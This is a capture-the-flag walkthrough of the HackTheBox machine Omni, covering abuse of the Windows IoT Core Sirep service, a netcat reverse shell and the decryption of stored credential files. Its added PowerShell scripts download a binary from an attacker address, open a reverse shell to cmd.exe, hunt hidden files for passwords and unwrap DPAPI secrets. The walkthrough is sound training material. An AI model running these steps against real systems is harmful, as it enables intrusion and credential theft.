HackTheBox: Omni (Windows)

Let’s start the box with an nmap scan.

[screenshot: nmap scan]

From the nmap scan we learn that the machine runs Windows Device Portal on port 8080. When we visit it we find a login page, but we don’t have credentials yet.

Searching for Windows Device Portal leads us to SirepRAT. Device Portal is the management interface of Windows 10 IoT Core, and SirepRAT abuses the Sirep test service that IoT Core exposes (by default on TCP 29817, 29819 and 29820), which hands out command execution without any authentication. We can test whether it works by running simple commands like ipconfig.

[screenshot: ipconfig via SirepRAT]

Since this works, the simplest route to a proper shell is to upload a netcat binary into a writable folder on the Windows box. On our machine we host the binary with python3 -m http.server 80 and fetch it from the target.

[screenshot: netcat transfer]

After the transfer we use this binary to connect back to our machine; a netcat listener on the chosen port must already be running there.

[screenshot: reverse shell command]
[screenshot: initial shell]
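
Added example (not part of the original post, and not SirepRAT’s own code): the on-target side of the netcat transfer and reverse shell as one PowerShell script, the kind of payload you would hand to SirepRAT’s LaunchCommandWithOutput or paste into the Device Portal’s Run command box. It adds two checks the post skips: that the drop directory really is writable, and that the downloaded binary matches the SHA-256 of the copy served from the attacking machine, so a tampered or truncated download is never executed. The attacker address 10.10.14.5, listener port 4444, the file name nc64.exe and the drop directory C:\Windows\System32\spool\drivers\color are assumptions, not values from the post.

```powershell
# Added example, not from the original post. Assumed values (not in the post):
# attacker IP, listener port, binary name and the drop directory, which is
# writable by low-privileged users on stock Windows installs.
$Attacker = '10.10.14.5'
$Port     = 4444
$DropDir  = 'C:\Windows\System32\spool\drivers\color'
$Binary   = Join-Path $DropDir 'nc64.exe'
# SHA-256 of the copy served by `python3 -m http.server 80` on the attacker
# (compute it there with sha256sum). Placeholder: the script refuses to run
# the binary until this is replaced with the real digest.
$Expected = '0000000000000000000000000000000000000000000000000000000000000000'

# 1. Confirm the drop directory is writable before relying on it.
$probe = Join-Path $DropDir ([IO.Path]::GetRandomFileName())
try {
    Set-Content -Path $probe -Value 'x' -ErrorAction Stop
    Remove-Item -Path $probe -Force
} catch {
    throw "Drop directory $DropDir is not writable: $($_.Exception.Message)"
}

# 2. Fetch the binary from the attacker's web server.
Invoke-WebRequest -Uri "http://$Attacker/nc64.exe" -OutFile $Binary -UseBasicParsing

# 3. Refuse to execute anything that does not match what we served.
$actual = (Get-FileHash -Path $Binary -Algorithm SHA256).Hash
if ($actual -ne $Expected) {
    Remove-Item -Path $Binary -Force
    throw "Hash mismatch for ${Binary}: got $actual, expected $Expected"
}

# 4. Reverse shell: `-e cmd.exe` binds cmd's stdin/stdout to the socket.
#    Start `nc -lvnp 4444` on the attacker before running this.
Start-Process -FilePath $Binary -ArgumentList @('-e', 'cmd.exe', $Attacker, $Port)
```

The hash check matters more than it looks: the transfer is plain HTTP over a network you do not control, and a binary you are about to run under whatever privileges the Sirep service grants is exactly the thing you want to verify.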

We get this initial shell as the omni user, but it isn’t that useful for us. While enumerating it we find that the Users directory doesn’t contain the other users’ profiles.

[screenshot: net user]

Although, as net user shows, other users do exist on the box.

[screenshot: Get-PSDrive]

Enumerating further, we find other drives; among them U:\ holds the users’ directories and their flags, which we can’t access yet because they belong to other users.

[screenshot: credentials file]

This is a hidden file in C:\Program Files\WindowsPowerShell\Modules\PackageManagement. We now have credentials for two users, so we go back to the login page on port 8080 and log in as each of them to get the flags. First we log in as the app user.
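
Added example (not from the original post): the enumeration steps above as one PowerShell pass from the initial shell: the local accounts, every file-system drive rather than just C:, the hidden files under the PackageManagement module directory named in the post, a search of those files for credential-looking lines, and the ACLs on whatever flag files can be found on U:\, so that “can’t access” is read off the permissions instead of guessed. The search patterns and the flag file names user.txt and root.txt are assumptions; the module directory is the one the post names.

```powershell
# Added example, not from the original post.

# 1. Accounts on the box. `net user` works even where the LocalAccounts
#    module (Get-LocalUser) is missing, as it may be on IoT Core.
net user

# 2. Every file-system drive. The post finds the user directories on U:\,
#    which C:\Users alone would never reveal.
Get-PSDrive -PSProvider FileSystem | Select-Object Name, Root, Used, Free

# 3. Hidden files under the module directory. Get-ChildItem silently skips
#    hidden entries unless -Force is given.
$dir = 'C:\Program Files\WindowsPowerShell\Modules\PackageManagement'
$hidden = Get-ChildItem -Path $dir -Force -Recurse -File |
    Where-Object { ($_.Attributes -band [IO.FileAttributes]::Hidden) -ne 0 }
$hidden | Select-Object FullName, Length, LastWriteTime

# 4. Grep those files for lines that set or use credentials
#    (pattern list is an assumption, extend as needed).
$hidden | Select-String -Pattern 'net user|password|/add|/user:' |
    Select-Object Path, LineNumber, Line

# 5. Why the flags are unreadable right now: show the ACL instead of guessing.
#    File names user.txt / root.txt are assumed.
Get-ChildItem -Path 'U:\' -Recurse -Include user.txt, root.txt -ErrorAction SilentlyContinue |
    ForEach-Object {
        try {
            $acl = Get-Acl -Path $_.FullName
            $acl.Access | Select-Object @{n='File';e={$_.FullName}}, IdentityReference, FileSystemRights, AccessControlType
        } catch {
            "$($_.FullName): $($_.Exception.Message)"
        }
    }
```

Step 3 is the one that finds the credentials on this box: a plain directory listing would have shown nothing, because the file is hidden. Step 5 tells you which account you need before you go looking for its password.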

[screenshot: login as app user]

After logging in there is an option to run a command, which we use to get a reverse shell. Since we already uploaded netcat we reuse the same binary; again, a netcat listener must be running on our machine.

[screenshot: running a command to get a reverse shell as app user]

We get the shell and can now read the user flag, but it is encrypted, so we need to decrypt it to see the flag.

[screenshot: user flag]
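
Added example (not from the original post): reading the encrypted flag. The post does not say what form the encryption takes; this example assumes the flag is a PSCredential or SecureString saved with Export-Clixml, which protects the secret with DPAPI in the scope of the user who saved it. That assumption also explains why the initial shell was no use here: DPAPI only unwraps the blob for the same account on the same machine, so a shell as app (and later administrator) is required, and the function below fails loudly when run as anyone else. The path U:\Users\app\user.txt is assumed.

```powershell
# Added example, not from the original post. Assumes the flag file is
# Export-Clixml output containing a PSCredential or SecureString.
function Read-ClixmlSecret {
    param([Parameter(Mandatory)][string]$Path)

    # Sanity check before doing anything else: Export-Clixml output is XML
    # whose root element is <Objs ...>.
    $head = Get-Content -Path $Path -TotalCount 1
    if ($head -notmatch '^<Objs ') {
        throw "$Path does not look like Export-Clixml output: $head"
    }

    # Import-Clixml hands the embedded blob to DPAPI. Under any account other
    # than the one that wrote it this typically fails with
    # 'Key not valid for use in specified state', which is the signal that
    # you have the file but not the right user.
    try {
        $obj = Import-Clixml -Path $Path
    } catch {
        throw "DPAPI unwrap failed as $(whoami): $($_.Exception.Message)"
    }

    if ($obj -is [System.Management.Automation.PSCredential]) {
        return $obj.GetNetworkCredential().Password
    }
    if ($obj -is [System.Security.SecureString]) {
        return [System.Net.NetworkCredential]::new('', $obj).Password
    }
    throw "Unexpected object type $($obj.GetType().FullName)"
}

# Assumed path; run from the shell obtained as the app user.
Read-ClixmlSecret -Path 'U:\Users\app\user.txt'
```

The same function reads the root flag from the administrator shell later on; only the path changes.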

The next part is the root flag, which we get by repeating the same steps we used for the app user with the administrator credentials. We need to log out first, or use an incognito window, because the portal session is still tied to the app user.

[screenshot: login as administrator]
[screenshot: command to get a reverse shell as administrator]

After running the command we get the reverse shell, provided the netcat listener is up.

[screenshot: root flag]

Happy Hacking!!!!

